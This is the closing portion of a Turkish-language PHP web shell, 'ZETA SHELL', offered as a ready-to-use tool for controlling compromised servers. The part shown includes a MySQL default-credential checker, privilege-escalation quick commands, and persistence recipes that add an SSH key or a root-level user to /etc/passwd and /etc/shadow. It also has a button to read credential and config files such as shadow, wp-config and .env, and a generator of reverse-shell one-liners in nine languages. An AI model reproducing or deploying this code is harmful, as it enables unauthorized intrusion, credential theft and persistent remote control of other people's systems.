İstek</h4><form method="post"><div class="flex-container"><div class="flex-item"><input type="text" name="network_target" placeholder="URL (örn: https://example.com)" required></div><div style="flex-grow: 0;"><button type="submit" name="run_network_tool" value="curl_req" class="action-btn"><i class="fas fa-cloud-download-alt"></i> Getir</button></div></div></form></div> <?php if ($opened_details == 'network'): ?><h4>Sonuç:</h4><pre class="command-output"><?php echo $action_result_output; ?></pre><?php endif; ?> <div class="content-section"><h4><i class="fas fa-list-alt"></i> Aktif Bağlantılar</h4><pre class="info-output"><?php echo runCommand('netstat -tulnp')['output']; ?></pre></div> </div> </details>
<details id="database" class="collapsible-section" <?php echo ($opened_details == 'database') ? 'open' : ''; ?>> <summary><i class="fas fa-database"></i> Veritabanı (MySQL)</summary> <div> <?php if (!function_exists('mysqli_connect')): ?><div class="message error"><i class="fas fa-times-circle"></i> Hata: PHP MySQLi yok!</div><?php else: ?> <div class="form-section" style="margin-top:0;"><h4><i class="fas fa-plug"></i> Bağlan & Sorgula</h4><form method="post"><div class="flex-container"><div class="flex-item-small"><input type="text" name="db_host" placeholder="Host" value="localhost"></div><div class="flex-item-small"><input type="text" name="db_user" placeholder="User"></div><div class="flex-item-small"><input type="password" name="db_pass" placeholder="Pass"></div><div class="flex-item-small"><input type="text" name="db_name" placeholder="DB Name"></div></div><textarea name="db_query" placeholder="SQL Sorgusu..." style="height: 100px;">SHOW DATABASES;</textarea><button type="submit" name="run_db_query" class="action-btn"><i class="fas fa-play"></i> Çalıştır</button></form></div> <?php if ($opened_details == 'database'): ?><h4>Sonuç:</h4><pre class="command-output"><?php echo $action_result_output; ?></pre><?php endif; ?><?php endif; ?> </div> </details>
<details id="dbcheck" class="collapsible-section" <?php echo ($opened_details == 'dbcheck') ? 'open' : ''; ?>> <summary><i class="fas fa-key"></i> DB Cred Checker (MySQL)</summary> <div> <div class="form-section" style="margin-top:0;"><h4><i class="fas fa-search"></i> Yaygın Şifreleri Dene</h4><form method="post"><div class="flex-container"><div class="flex-item"><input type="text" name="db_host_check" placeholder="Host IP / Domain" value="127.0.0.1"></div><div style="flex-grow: 0;"><button type="submit" name="check_db_creds" class="action-btn"><i class="fas fa-key"></i> Dene!</button></div></div></form></div> <?php if ($opened_details == 'dbcheck'): ?><h4>Check Sonucu:</h4><pre class="info-output"><?php echo $action_result_output; ?></pre><?php endif; ?> </div> </details>
<details id="pwn" class="collapsible-section" <?php echo ($opened_details == 'pwn') ? 'open' : ''; ?>> <summary><i class="fas fa-user-secret"></i> Pwn / Kalıcılık Yardımcısı</summary> <div> <div class="content-section" style="margin-top:0;"><h4><i class="fas fa-question-circle"></i> Yetki Yükseltme Kontrolleri</h4> <button class="quick-cmd-btn" onclick="setCmd('sudo -l')">sudo -l</button> <button class="quick-cmd-btn" onclick="setCmd('find / -perm -4000 -type f -ls 2>/dev/null')">SUID Bul</button> <button class="quick-cmd-btn" onclick="setCmd('find / -perm -2000 -type f -ls 2>/dev/null')">SGID Bul</button> <a href="https://gtfobins.github.io/" target="_blank"><button class="quick-cmd-btn">GTFOBins</button></a> </div> <div class="content-section"><h4><i class="fas fa-link"></i> Kalıcılık Komutları (DİKKAT!)</h4> <p><small>Aşağıdaki komutları Kopyala/Yapıştır ile Komut Çalıştır bölümünde kullanabilirsin (Yetki gerektirir!).</small></p> <b>SSH Key Ekle:</b><br><pre style="font-size:0.75em;">mkdir -p ~/.ssh && echo "SENIN_SSH_PUBLIC_KEY_BURAYA" >> ~/.ssh/authorized_keys && chmod 700 ~/.ssh && chmod 600 ~/.ssh/authorized_keys</pre> <b>Yeni User Ekle (passwd/shadow):</b><br><pre style="font-size:0.75em;"># 1. Adım: Şifre Hash'i Oluştur (örn: openssl passwd -1 'YENISIFRE')
# echo 'yenikullanici:HASH_BURAYA:0:0:root:/root:/bin/bash' >> /etc/passwd
# echo 'yenikullanici:HASH_BURAYA:19800:0:99999:7:::' >> /etc/shadow</pre> </div> </div> </details>
<details id="helpers" class="collapsible-section" <?php echo ($opened_details == 'helpers') ? 'open' : ''; ?>> <summary><i class="fas fa-tools"></i> Yardımcı Araçlar</summary> <div> <div class="content-section" style="margin-top:0;"> <h4><i class="fas fa-key"></i> Config Avcısı</h4> <form method="post"> <div class="quick-cmd-buttons"> <?php $common_configs_keys = array('passwd','shadow','wpconfig','wpconfig_up','env','env_up','apache_conf','nginx_conf','php_ini','my_cnf','sshd_config'); foreach ($common_configs_keys as $key) { ?> <button type="submit" name="read_config_post" value="<?php echo htmlspecialchars($key); ?>" class="config-btn" title="/path/to/<?php echo htmlspecialchars($key); ?>"><?php echo htmlspecialchars($key); ?></button> <?php } ?> <input type="hidden" name="config_file_key" id="config_file_key_hidden"> </div> </form> <?php if ($opened_details == 'helpers' && isset($_POST['read_config_post'])): ?><h5>Config İçeriği:</h5><pre class="info-output"><?php echo $action_result_output; ?></pre><?php endif; ?> </div> <div class="content-section"><h4><i class="fas fa-satellite-dish"></i> Reverse Shell</h4><form onsubmit="generateShell(event)"><div class="flex-container"><div class="flex-item-small">IP: <input type="text" id="rev_ip" value="<?php echo htmlspecialchars($_SERVER['REMOTE_ADDR']); ?>"></div><div class="flex-item-small">Port: <input type="text" id="rev_port" value="4444"></div><div class="flex-item">Type: <select id="shell_type"><option value="bash_tcp">Bash</option><option value="nc_e">NC -e</option><option value="nc_mkfifo">NC mkfifo</option><option value="python3">Py3</option><option value="php">PHP</option><option value="perl">Perl</option><option value="ruby">Ruby</option><option value="socat">Socat</option><option value="powershell">PS</option></select></div><div style="flex-grow: 0;"><button type="submit" class="action-btn"><i class="fas fa-cogs"></i> Üret</button></div></div><pre id="generated_shell_output" class="command-output" style="margin-top:10px; display:none;"></pre></form></div> <div class="content-section"><h4><i class="fas fa-retweet"></i> Encode/Decode & Hash</h4><form method="post"><textarea name="helper_input" placeholder="Metin..." style="height: 60px;"><?php echo isset($_POST['helper_input']) ? htmlspecialchars($_POST['helper_input']) : ''; ?></textarea><div class="quick-cmd-buttons"><button type="submit" name="run_helper_tool" value="base64_encode" class="action-btn">B64 Enc</button><button type="submit" name="run_helper_tool" value="base64_decode" class="action-btn">B64 Dec</button><button type="submit" name="run_helper_tool" value="url_encode" class="action-btn">URL Enc</button><button type="submit" name="run_helper_tool" value="url_decode" class="action-btn">URL Dec</button><button type="submit" name="run_helper_tool" value="md5" class="action-btn">MD5</button><button type="submit" name="run_helper_tool" value="sha1" class="action-btn">SHA1</button></div></form><?php if ($opened_details == 'helpers' && isset($_POST['run_helper_tool'])): ?><h5>Sonuç:</h5><pre class="info-output"><?php echo $action_result_output; ?></pre><?php endif; ?></div> </div> </details>
<!-- Footer -->
<div class="hacker-footer">
<p>~~ ZETA SHELL <?php echo $SHELL_VERSION; ?> coded by <span>NESAS_0DAY</span> ~~</p>
<p><a href="https://instagram.com/arobinks" target="_blank"><i class="fab fa-instagram"></i> Instagram: arobinks</a></p>
</div>
</div> <!-- container-fluid sonu -->
<!-- Gizli Formlar -->
<form method="post" id="renameForm" class="hidden-form"><input type="hidden" name="original_name" id="rename_original_name"><input type="text" name="new_name" id="rename_new_name" required><button type="submit" name="rename">Rename!</button></form>
<form method="post" id="chmodForm" class="hidden-form"><input type="hidden" name="item_name" id="chmod_item_name"><input type="text" name="new_perm" id="chmod_new_perm" pattern="[0-7]{3,4}" required><button type="submit" name="chmod_item">Chmod!</button></form>
<!-- Müzik Çalar -->
<audio id="hackerAudio" loop>
<!-- !!! ALPHA: Buradaki src'yi gerçek müzik dosyanın URL'si veya yolu ile değiştir !!! -->
<source src="https://github.com/noxebey/satana/raw/main/satana.mp3" type="audio/mpeg">
Tarayıcın sesi desteklemiyor.
</audio>
<script>
// --- ZETA SHELL v13.1 JavaScript ---
var typed = new Typed('#shell-title', { strings: ['NESAS ZETA SHELL <?php echo $SHELL_VERSION; ?>', 'ZETA SHELL ACTIVE', 'NESAS_0DAYWAS HERE^1000'], typeSpeed: 40, backSpeed: 25, loop: true, showCursor: true, cursorChar: '_', smartBackspace: true });
document.addEventListener('DOMContentLoaded', function() {
const messageDiv = document.querySelector('.message');
if(messageDiv) { setTimeout(() => { messageDiv.style.opacity = '0'; setTimeout(() => messageDiv.style.display = 'none', 5000); }, 5000); }
const detailToOpenId = '<?php echo $opened_details; ?>';
if(detailToOpenId) { const detailToOpen = document.getElementById(detailToOpenId); if(detailToOpen) { detailToOpen.open = true; detailToOpen.scrollIntoView({behavior: "smooth", block: "start"}); } }
const editForm = document.getElementById('editFormContainer');
const renameForm = document.querySelector('.form-section h3 i.fa-edit')?.closest('.form-section');
if (editForm && window.location.search.includes('e=1')) { editForm.scrollIntoView({behavior: "smooth", block: "center"}); }
else if (renameForm && window.location.search.includes('r=1')) { renameForm.scrollIntoView({behavior: "smooth", block: "center"}); }
});
function perms_to_string_js(permsOctalStr) { if (!permsOctalStr || permsOctalStr === '????') return 'Unknown'; const perms = parseInt(permsOctalStr, 8); if (isNaN(perms)) return 'Invalid'; let info = ''; if ((perms & 0xC000) === 0xC000) info = 's'; else if ((perms & 0xA000) === 0xA000) info = 'l'; else if ((perms & 0x8000) === 0x8000) info = '-'; else if ((perms & 0x6000) === 0x6000) info = 'b'; else if ((perms & 0x4000) === 0x4000) info = 'd'; else if ((perms & 0x2000) === 0x2000) info = 'c'; else if ((perms & 0x1000) === 0x1000) info = 'p'; else info = 'u'; info += ((perms & 0x0100) ? 'r' : '-'); info += ((perms & 0x0080) ? 'w' : '-'); info += ((perms & 0x0040) ? ((perms & 0x0800) ? 's' : 'x' ) : ((perms & 0x0800) ? 'S' : '-')); info += ((perms & 0x0020) ? 'r' : '-'); info += ((perms & 0x0010) ? 'w' : '-'); info += ((perms & 0x0008) ? ((perms & 0x0400) ? 's' : 'x' ) : ((perms & 0x0400) ? 'S' : '-')); info += ((perms & 0x0004) ? 'r' : '-'); info += ((perms & 0x0002) ? 'w' : '-'); info += ((perms & 0x0001) ? ((perms & 0x0200) ? 't' : 'x' ) : ((perms & 0x0200) ? 'T' : '-')); return info + ' (' + permsOctalStr + ')'; }
document.querySelectorAll('.perms').forEach(el => { el.title = perms_to_string_js(el.textContent); });
function setCmd(cmd) { const cmdInput = document.getElementById('command_input'); cmdInput.value = cmd; cmdInput.focus(); document.getElementById('command').open = true; document.getElementById('command').scrollIntoView({behavior: "smooth", block: "start"}); }
function promptChmod(itemName, currentPerms, submitNow = false) { const newPerms = prompt("Yeni izin (örn: 0755) [" + itemName + "]:", currentPerms); if (newPerms !== null && /^[0-7]{3,4}$/.test(newPerms)) { document.getElementById('chmod_item_name').value = itemName; document.getElementById('chmod_new_perm').value = newPerms; if (submitNow || confirm(itemName + " -> " + newPerms + " ?")) { document.getElementById('chmodForm').submit(); } } else if (newPerms !== null) { alert("Geçersiz format!"); } }
document.querySelectorAll('.config-btn').forEach(button => { button.addEventListener('click', function(event) { event.preventDefault(); document.getElementById('config_file_key_hidden').value = this.value; this.closest('form').submit(); }); });
function generateShell(event) { event.preventDefault(); const ip = document.getElementById('rev_ip').value; const port = document.getElementById('rev_port').value; const type = document.getElementById('shell_type').value; let command = ''; if (!ip || !port) { alert('IP ve Port gir!'); return; } switch(type) { case 'bash_tcp': command = `bash -i >& /dev/tcp/${ip}/${port} 0>&1`; break; case 'nc_e': command = `nc -e /bin/bash ${ip} ${port}`; break; case 'nc_mkfifo': command = `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ${ip} ${port} >/tmp/f`; break; case 'python3': command = `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${ip}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'`; break; case 'php': command = `php -r '$sock=fsockopen("${ip}",${port});exec("/bin/bash -i <&3 >&3 2>&3");'`; break; case 'perl': command = `perl -e 'use Socket;$i="${ip}";$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'`; break; case 'ruby': command = `ruby -rsocket -e'f=TCPSocket.open("${ip}",${port}).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'`; break; case 'socat': command = `socat tcp-connect:${ip}:${port} exec:/bin/bash,pty,stderr,setsid,sigint,sane`; break; case 'powershell': command = `$client = New-Object System.Net.Sockets.TCPClient("${ip}",${port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()`; break; default: command = 'Bilinmeyen tür'; } const outputArea = document.getElementById('generated_shell_output'); outputArea.textContent = command; outputArea.style.display = 'block'; try { navigator.clipboard.writeText(command).then(() => alert('Komut kopyalandı!'), () => alert('Kopyalanamadı!')); } catch (err) { alert('Kopyalama hatası!'); } }
const audioPlayer = document.getElementById('hackerAudio'); const musicButton = document.getElementById('musicButton'); let isPlaying = false; audioPlayer.volume = 0.2;
musicButton.addEventListener('click', () => { if (isPlaying) { audioPlayer.pause(); musicButton.textContent = '🎵'; musicButton.style.filter = 'grayscale(80%)'; } else { audioPlayer.play().catch(e => console.error("Müzik hatası:", e)); musicButton.textContent = '⏸️'; musicButton.style.filter = 'none'; } isPlaying = !isPlaying; });
// --- AJAX ve Download İşlemleri için PHP blokları ---
<?php
if (isset($_GET['ajax_get_content']) && isset($_GET['file']) && isset($_GET['p'])) { header('Content-Type: application/json'); $ajax_path = decodePath($_GET['p']); $ajax_file = urldecode($_GET['file']); $full_ajax_path = rtrim($ajax_path, '/') . '/' . $ajax_file; if (!file_exists($full_ajax_path) || !is_file($full_ajax_path)) { echo json_encode(['success' => false, 'error' => 'Dosya yok!']); } elseif (!is_readable($full_ajax_path)) { echo json_encode(['success' => false, 'error' => 'Okunamıyor!']); } else { $content = @file_get_contents($full_ajax_path); if ($content === false) { echo json_encode(['success' => false, 'error' => 'Okuma hatası!']); } else { $content_utf8 = mb_convert_encoding($content, 'UTF-8', mb_detect_encoding($content, 'UTF-8, ISO-8859-9, ISO-8859-1', true)); echo json_encode(['success' => true, 'filename' => htmlspecialchars($ajax_file), 'content' => $content_utf8]); } } exit; }
?>
</script>
</body>
</html>
<?php @ob_end_flush(); // Buffer'ı gönder ve kapat ?>